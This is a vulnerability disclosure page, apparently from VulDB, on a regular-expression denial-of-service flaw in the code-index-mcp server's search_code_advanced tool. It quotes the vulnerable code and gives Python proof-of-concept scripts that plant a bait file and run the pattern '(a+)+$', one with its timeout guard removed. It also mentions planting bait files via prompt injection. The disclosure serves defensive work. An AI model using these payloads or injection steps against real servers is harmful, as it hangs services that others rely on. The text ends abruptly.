Submit #830786: johnhuang316 code-index-mcp Latest Denial of Serviceinfo

Titeljohnhuang316 code-index-mcp Latest Denial of Service
BeschreibungSummary CODE-INDEX-MCP contains a ReDoS vulnerability. This issue stems from improper handling of user-input patterns by the BasicSearchStrategy within the server's SearchStrategy. The search_code_advanced tool on this MCP server recursively reads all files of a specified type (e.g., *.py) in the directory and performs pattern matching against the pattern. If an attacker uses methods such as prompt injection to write a .py file containing aaaaaaaaaaaaaaaaaaaaaaaab to any directory (e.g., /tmp/project) and calls search_code_advanced with a malicious pattern (e.g., (a+)+$), a ReDoS attack will be triggered. Detail CODE-INDEX-MCP is a Python-based MCP server that provides codebase indexing and code search capabilities. It exposes multiple MCP tools including search_code_advanced, which accepts parameters such as pattern (the search regex/string), base_path (the directory to search), and regex (a boolean flag to enable regex mode). When invoked, the tool recursively walks the specified directory, reads the contents of all files matching supported extensions, and performs pattern matching against each line. The server implements a fallback search strategy called BasicSearchStrategy, which is used when no external search tools (such as ripgrep, ag, grep, or ugrep) are available on the system. This strategy uses Python's native re module for regex matching. While the code includes a function is_safe_regex_pattern() to detect potentially dangerous patterns, this check is insufficient and can be bypassed by common ReDoS patterns. When the regex is set to True, the pattern is compiled directly into a Python regex and applied line-by-line against all file contents. If an attacker supplies a malicious regex pattern with nested quantifiers (e.g., (a+)+$, (.),or([a−z]+)+) and the target files contain content that triggers catastrophic backtracking (such as repeated characters followed by a non-matching terminator), the regex engine enters exponential-time matching. This causes CPU exhaustion and effectively hangs the server, resulting in a Denial of Service. The attack is particularly effective when combined with file write capabilities: an attacker can first create a file containing ReDoS-triggering content (e.g., aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab), then invoke search_code_advanced with a malicious pattern. Alternatively, if target directories contain files with naturally occurring repeated character sequences (such as Markdown table separators |----------| or comment dividers # ========), the attacker can craft a targeted regex (e.g., (-+)+$) to exploit these existing contents. Vulnerable Code The search_code_advanced MCP tool is defined in the server with a regex parameter that enables regex pattern matching: Version: Latest File: src/code_index_mcp/server.py (Lines 280-307) @mcp.tool() @handle_mcp_tool_errors(return_type="dict") @with_concurrency_limit def search_code_advanced( pattern: str, ctx: Context, case_sensitive: bool = True, context_lines: int = 0, file_pattern: str = None, fuzzy: bool = False, regex: bool = None, start_index: int = 0, max_results: int | None = 10, ) -> dict[str, Any]: """ Search for code pattern with pagination. Auto-selects best search tool (ugrep/ripgrep/ag/grep). Supports glob file_pattern (e.g., "*.py"), regex patterns, and fuzzy matching (ugrep only). """ return SearchService(ctx).search_code( pattern=pattern, case_sensitive=case_sensitive, context_lines=context_lines, file_pattern=file_pattern, fuzzy=fuzzy, regex=regex, start_index=start_index, max_results=max_results, ) When no external search tools are available, the server falls back to BasicSearchStrategy, which uses Python's re module. The is_safe_regex_pattern()function attempts to detect dangerous patterns but has insufficient coverage: Version: Latest File: src/code_index_mcp/search/base.py (Lines 124-156) def is_safe_regex_pattern(pattern: str) -> bool: """ Check if a pattern appears to be a safe regex pattern. Args: pattern: The search pattern to check Returns: True if the pattern looks like a safe regex, False otherwise """ # Strong indicators of regex intent strong_regex_indicators = ['|', '(', ')', '[', ']', '^', '$'] # Weaker indicators that need context weak_regex_indicators = ['.', '*', '+', '?'] # Check for strong regex indicators has_strong_regex = any(char in pattern for char in strong_regex_indicators) # Check for weak indicators with context has_weak_regex = any(char in pattern for char in weak_regex_indicators) # If has strong indicators, likely regex if has_strong_regex: # Still check for dangerous patterns dangerous_patterns = [ r'(.+)+', # Nested quantifiers r'(.*)*', # Nested stars r'(.{0,})+', # Potential ReDoS patterns ] has_dangerous_patterns = any(dangerous in pattern for dangerous in dangerous_patterns) return not has_dangerous_patterns The check only looks for three specific literal substrings. Patterns like (a+)+$, ([a-z]+)+, or (x+x+)+y bypass this validation entirely. In BasicSearchStrategy.search(), the user-supplied pattern is compiled and executed against every line of every file: Version: Latest File: src/code_index_mcp/search/basic.py (Lines 69-74) try: if regex: # Use regex mode - check for safety first if not is_safe_regex_pattern(pattern): raise ValueError(f"Potentially unsafe regex pattern: {pattern}") search_regex = re.compile(pattern, flags) The compiled regex is then applied to each line without any timeout protection: Version: Latest File: src/code_index_mcp/search/basic.py (Lines 103-110) try: with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: for line_num, line in enumerate(f, 1): if search_regex.search(line): content = line.rstrip('\n') if rel_path not in results: results[rel_path] = [] results[rel_path].append((line_num, content)) When encountering content that triggers catastrophic backtracking (e.g., a line containing aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab), the search_regex.search(line) call with a malicious pattern like (a+)+$ will enter exponential-time matching, causing CPU exhaustion and hanging the server indefinitely. PoC Using Python Script This PoC demonstrates the ReDoS vulnerability by directly invoking the BasicSearchStrategy class, bypassing the MCP protocol layer to isolate and verify the vulnerable code path. Step 1. Create a Python script PoC.py with the following content: import os, tempfile, time, signal from code_index_mcp.search.basic import BasicSearchStrategy # 1. Create bait file with ReDoS-triggering content tmpdir = tempfile.mkdtemp(prefix="redos_verify_") bait_file = os.path.join(tmpdir, "bait.txt") with open(bait_file, "w") as f: f.write("a"*35+"b\n") # 35 'a's followed by 'b' triggers exponential backtracking strategy = BasicSearchStrategy() # 2. Baseline test with safe pattern print("--- Baseline: safe regex ---") t0 = time.time() results = strategy.search(pattern="normal", base_path=tmpdir, regex=False) elapsed_safe = time.time() - t0 print(f"Elapsed:{elapsed_safe:.4f}s") # 3. ReDoS test with malicious pattern (with 10s timeout protection) print("\n--- ReDoS: malicious regex '(a+)+$' ---") def timeout_handler(signum, frame): raise TimeoutError("ReDoS confirmed! Regex matching exceeded 10 seconds") signal.signal(signal.SIGALRM, timeout_handler) signal.alarm(10) try: t0 = time.time() results = strategy.search(pattern="(a+)+$", base_path=tmpdir, regex=True) elapsed_redos = time.time() - t0 signal.alarm(0) print(f"Elapsed: {elapsed_redos:.4f}s") if elapsed_redos > 1.0: print(f" VULNERABLE: took {elapsed_redos:.1f}s (normal should be <0.01s)") except TimeoutError as e: signal.alarm(0) print(f"VULNERABLE CONFIRMED: {e}") # 4. Cleanup os.unlink(bait_file) os.rmdir(tmpdir) Step 2. Run the script: python PoC.py According to the timeout protection mechanism in the proof-of-concept, the matching time for malicious patterns exceeded 10 seconds. By disabling the timeout protection mechanism in poc.py import os, tempfile, time, signal from code_index_mcp.search.basic import BasicSearchStrategy # 1. Create bait file with ReDoS-triggering content tmpdir = tempfile.mkdtemp(prefix="redos_verify_") bait_file = os.path.join(tmpdir, "bait.txt") with open(bait_file, "w") as f: f.write("a" * 35 + "b\n") # 35 'a's followed by 'b' triggers exponential backtracking strategy = BasicSearchStrategy() # 2. Baseline test with safe pattern print("--- Baseline: safe regex ---") t0 = time.time() results = strategy.search(pattern="normal", base_path=tmpdir, regex=False) elapsed_safe = time.time() - t0 print(f" Elapsed: {elapsed_safe:.4f}s") # 3. ReDoS test with malicious pattern print("\n--- ReDoS: malicious regex '(a+)+$' ---") # def timeout_handler(signum, frame): # raise TimeoutError("ReDoS confirmed! Regex matching exceeded 10 seconds") # signal.signal(signal.SIGALRM, timeout_handler) # signal.alarm(10) t0 = time.time() results = strategy.search(pattern="(a+)+$", base_path=tmpdir, regex=True) elapsed_redos = time.time() - t0 # signal.alarm(0) print(f" Elapsed: {elapsed_redos:.4f}s") if elapsed_redos > 1.0: print(f" VULNERABLE: took {elapsed_redos:.1f}s (normal should be <0.01s)") # 4. Cleanup os.unlink(bait_file) os.rmdir(tmpdir) running po
Quelle⚠️ https://github.com/johnhuang316/code-index-mcp/issues/84
Benutzer
 skywings (UID 98274)
Einreichung15.05.2026 10:36 (vor 20 Tagen)
Moderieren02.06.2026 17:43 (18 days later)
StatusAkzeptiert
VulDB Eintrag367961 [johnhuang316 code-index-mcp bis 2.14.0 search_code_advanced is_safe_regex_pattern regex Denial of Service]
Punkte20

Do you want to use VulDB in your project?

Use the official API to access entries easily!